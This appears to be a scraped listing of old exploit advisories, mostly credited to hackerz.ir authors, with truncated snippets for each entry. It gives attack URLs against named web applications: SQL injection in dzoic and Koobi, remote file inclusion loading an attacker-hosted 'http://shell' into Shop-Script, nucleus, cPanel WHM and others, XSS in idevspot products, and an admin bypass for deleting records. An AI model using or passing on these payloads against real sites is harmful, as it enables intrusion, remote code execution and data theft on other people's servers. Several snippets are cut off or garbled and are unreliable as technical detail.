dzoic-sql.txt

By :s3rv3rhack3rAli Jasbi From hackerz.ir vendro : dzoic.com version : all risk : high bug : http://Victim/dzoic/index.php?handler=search&action=perform&searchtype=members&fname=Sql...

abledating v2.4 (search_results.php) Xss / Sql Injection Vulnerability

Exploit for unknown platform in category web applications ====================================================================== abledating v2.4 searchresults.php Xss / Sql Injection Vulnerability ====================================================================== By : Ali Jasbi hackerz.ir...

dzoic handshakes sql injection >> index.php on $fname

By :s3rv3rhack3rAli Jasbi From hackerz.ir vendro : dzoic.com version : all risk : high bug : http://Victim/dzoic/index.php?handler=search&action=perform&searchtype=members&fname=Sql...

Remote File Inclusion

b2evolution Remote File Inclusion Affected Software .: b2evolution Download..: http://b2evolution.net/ Risk ..............: high Date .........: 25/4/2007 Found by ..........: s433donlylinux Contact ...........: [email protected] Web .............: Www.hackerz.ir special thanx ........... A...

Shop-Script v 2.0 >> RFI

+++++++ name & version :Shop-Script & 2.0 vendor: www.brothersoft.com/business/e-commerce/shop-script21943.html by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,farzad exploit:http://victim/cart.php?langlist=http://shell ++++++...

modbuild >> 4.1 Remote File Inclusion

modbuild 4.1 Remote File Inclusion Affected Software .: Download..: Risk ..............: high Date .........: 26/4/2007 Found by ..........: s433donlylinux Contact ...........: [email protected] Web .............: Www.hackerz.ir special thanx ........... B4h4r3hir my best friend :x & ali...

nucleus 3.22 >> RFI

VENDOR :http://nucleuscms.org/ BY : s3rv3rhack3r hackerz.ir admin bug: nucleus3.22/nucleus/plugins/skinfiles/index.php = include$DIRLIBS . 'PLUGINADMIN.php'; Exloit: http://victim/nucleus/plugins/skinfiles/index.php?DIRLIBS=http://shell...

blogsystem 1.4 >> local & remote = -rfi & lfi & -xss

demo: blog23.com by : hackerz.ir userz ! ADMIN/index.php include$category."/".$folder."".$page.".php"; ADMIN/index.php include$category."/".$action.".php"; ADMIN/login.php include$lngTexts; ADMIN/login.php include$lngConfig; BO/index.php include$category."/".$folder."".$page.".php"; BO/index.php...

phpMYTGP v v1.4b >> RFI

+++++++ name & version :phpMYTGP & v1.4b vendor: www.allthescripts.com/page-207.htm by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,farzad exploit : http://victim/addvip.php?msetstr"PROGSDIR"=http://shell ++++++...

comus 2.0 Final >> RFI

++++++ name & version : comus 2.0 Final download :hotscripts.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,farzad exploit: http://victim/accept.php?DOCUMENTROOT=http://shell ++++++...

MyNewsGroups >> RFI in include.php

Author: Carlos Sanchez,[email protected] BY : www.hackerz.ir users, ali & saeid exploit : include.php?myngroot=http://shell...

netbingo v 2000 >> RFI

name & version :netbingo & 2000 vendor: http://www.proactech.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,farzad exploit :http://victim/bingoserver.php3?responsedir=http://shell...

whm-rfi.txt

name : web host manager vendor : cpanel.net by : s3rv3rhack3r ali at hackerz dot ir web-site : www.hackerz.ir - ali.hackerz.ir exploit: http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?...

remote file include in whm (all version)

name : web host manager vendor : cpanel.net by : s3rv3rhack3r ali at hackerz dot ir web-site : www.hackerz.ir - ali.hackerz.ir exploit: http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?...

BizDirectory all version xss

BizDirectory All version == RFI vendor : idevspot.com By : s3rv3rhack3r www: hackerz.ir & h4ckerz.com www.domain.com/BizDirectory/Feed.php?stylesheet=xss www.domain.com/BizDirectory/status.php?message=xss...

NixieAffiliate all version bypass admin and xss

NixieAffiliate all version vendor : idevspot.com By : s3rv3rhack3r www: hackerz.ir & h4ckerz.com Bypass for delete any aff ID : www.domain.com/NixieAffiliate/delete.php?id=1 Xss : www.domain.com/NixieAffiliate/forms/lostpassword.php?error=xss...

PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities

Exploit for unknown platform in category web applications ======================================================== PhpLinkExchange 1.0 include/xss Remote Vulnerabilities ======================================================== By : s3rv3rhack3r www: hackerz.ir & h4ckerz.com remote file include :...

PhpLinkExchange 1.0 - Include Cross-Site Scripting

PhpLinkExchange 1.0 - Include Cross-Site Scripting vendor :www.idevspot.com Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange By : s3rv3rhack3r www: hackerz.ir & h4ckerz.com remote file include : http://www.domain.com/PhpLinkExchange/bitslistings.php?svrrootPhpStart=shell.txt? xss:...

text ads xss attack

vendor : www.idevspot.com version : all version By : s3rv3rhack3r www : hackerz.ir & h4ckerz.com http://localhost/textads/clients/delete.php?id=xss http://victim/textads/clients/error.php?errorxss and more...

koobi.txt

vendor:http://www.dream4.de dork:"powered by Koobi Pro 5.6" vuln : http://host/index.php?p=showtopic&toid=SQL http://host/index.php?p=showtopic&toid=XSS Path Disclosure:http://host/index.php?area=1&p=' Author : Vampire [email protected] Homepage : Www.HackerZ.iR Www.H4ckerZ.Com Iran...